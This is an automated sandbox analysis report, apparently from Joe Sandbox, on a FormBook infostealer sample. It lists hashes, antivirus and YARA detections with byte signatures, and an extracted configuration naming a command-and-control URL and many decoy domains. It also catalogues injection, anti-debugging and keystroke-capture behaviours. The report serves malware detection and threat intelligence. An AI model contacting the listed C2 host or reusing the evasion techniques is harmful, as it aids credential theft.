Windows Analysis Report SecuriteInfo.com.Variant.Zusy.394472.15672.20727

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Zusy.394472.15672.20727 (renamed file extension from 20727 to exe)
Analysis ID: 452434
MD5: 89cfb542cda6a428cc5c02feaf3c55f8
SHA1: 9a0606c633ffe5ae4b6dcb7dcfba57b7e22cb05d
SHA256: b663fea76aadbf574e5bb9f704ad689ec10f0d720b0b9641e70b27494fe4cc17
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yjhlgg.com/grve/"], "decoy": ["jrvinganimalexterminator.com", "smallsyalls.com", "po1c3.com", "mencg.com", "aussieenjoyment.today", "espace22.com", "aanmelding-desk.info", "gallopshoes.com", "nftsexy.com", "ricosdulcesmexicanos.com", "riseswift.com", "thechicthirty.com", "matdcg.com", "alternet.today", "creativehuesdesigns.com", "rjkcrafts.com", "lowdosemortgage.com", "adoptahamster.com", "wellness-sense.com", "jacardcapital.com", "pastiindonesia.com", "lindsaynathan2021.com", "brisbanemagicians.com", "tvglanz.com", "388384.com", "mitgrim.com", "endonelatrading.com", "political.singles", "ganjegirls.com", "democratscancelled.com", "ytzhubao.com", "roiskylands.com", "zamlgroup.com", "winstonsalemathleticclub.com", "62qtz2.com", "caddyys.com", "ecorarte.com", "coonier.com", "cbgmanhattan-hub.com", "givanon.com", "tioniis11.com", "variceselite.com", "tasaciona.com", "hiphopeconomicdevelopment.com", "citrixfile.com", "piebuilder.com", "drmetalpublishing.com", "themesthatyoulike.com", "vinhomes-phamhung.info", "ardecentro.com", "gameshowsatwork.com", "go-rillathebrand.com", "virtualppo.com", "nogodbeforeme.net", "fabrezeairpurifiers.com", "roorisor.com", "elaraberentcar.com", "rugpat.com", "renewalbyheather.com", "innocox.com", "ztsj10086.com", "channelarmor.info", "thecarbonbox.store", "edicionesvita.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: www.yjhlgg.com/grve/, Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for domain / URL
          Source: www.yjhlgg.com/grve/, Virustotal: Detection: 8%
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Virustotal: Detection: 51%
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Metadefender: Detection: 22%
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, ReversingLabs: Detection: 60%
          Yara detected FormBook
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Joe Sandbox ML: detected
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.5c0000.2.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000003.639462821.00000000023F0000.00000004.00000001.sdmp, SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 4x nop then pop edi, 3_2_0040E376
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 4x nop then pop edi, 3_2_0040E37A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 4x nop then pop edi, 3_2_0040E3C8

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.yjhlgg.com/grve/
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000002.644990740.000000000063A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419D50 NtCreateFile,3_2_00419D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419E00 NtReadFile,3_2_00419E00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419E80 NtClose,3_2_00419E80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419F30 NtAllocateVirtualMemory,3_2_00419F30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419DFB NtReadFile,3_2_00419DFB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419E7A NtClose,3_2_00419E7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00419F2A NtAllocateVirtualMemory,3_2_00419F2A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A296E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A29660
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A29860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A2B040 NtSuspendThread,3_2_00A2B040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A2A3B0 NtGetContextThread,3_2_00A2A3B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A295F0 NtQueryInformationFile,3_2_00A295F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A295D0 NtClose,3_2_00A295D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29520 NtWaitForSingleObject,3_2_00A29520
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29560 NtWriteFile,3_2_00A29560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29540 NtReadFile,3_2_00A29540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A296D0 NtCreateKey,3_2_00A296D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29610 NtEnumerateValueKey,3_2_00A29610
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29670 NtQueryInformationProcess,3_2_00A29670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29650 NtQueryValueKey,3_2_00A29650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A297A0 NtUnmapViewOfSection,3_2_00A297A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29780 NtMapViewOfSection,3_2_00A29780
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29730 NtQueryVirtualMemory,3_2_00A29730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29710 NtQueryInformationToken,3_2_00A29710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A2A710 NtOpenProcessToken,3_2_00A2A710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29760 NtOpenProcess,3_2_00A29760
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A2A770 NtOpenThread,3_2_00A2A770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29770 NtSetInformationFile,3_2_00A29770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A298A0 NtWriteVirtualMemory,3_2_00A298A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A298F0 NtReadVirtualMemory,3_2_00A298F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29820 NtEnumerateKey,3_2_00A29820
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29840 NtDelayExecution,3_2_00A29840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A299A0 NtCreateSection,3_2_00A299A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A299D0 NtCreateProcessEx,3_2_00A299D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29910 NtAdjustPrivilegesToken,3_2_00A29910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29950 NtQueueApcThread,3_2_00A29950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29A80 NtOpenDirectoryObject,3_2_00A29A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29A20 NtResumeThread,3_2_00A29A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29A00 NtProtectVirtualMemory,3_2_00A29A00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29A10 NtQuerySection,3_2_00A29A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29A50 NtCreateFile,3_2_00A29A50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29B00 NtSetValueKey,3_2_00A29B00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A2AD30 NtSetContextThread,3_2_00A2AD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Code function: 3_2_00A29FE0 NtCreateMutant,3_2_00A29FE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E0D203_2_009E0D20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A02D503_2_00A02D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB1D553_2_00AB1D55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A91EB63_2_00A91EB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB2EF73_2_00AB2EF7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A06E303_2_00A06E30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A6AE603_2_00A6AE60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB1FF13_2_00AB1FF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00ABDFCE3_2_00ABDFCE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Code function: String function: 00A75720 appears 85 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Code function: String function: 009EB150 appears 177 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Code function: String function: 00A3D08C appears 50 times
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000003.644541453.000000000250F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000002.644776222.0000000000420000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemsvfw32.dll.muij% vs SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000003.00000002.647485358.0000000000ADF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
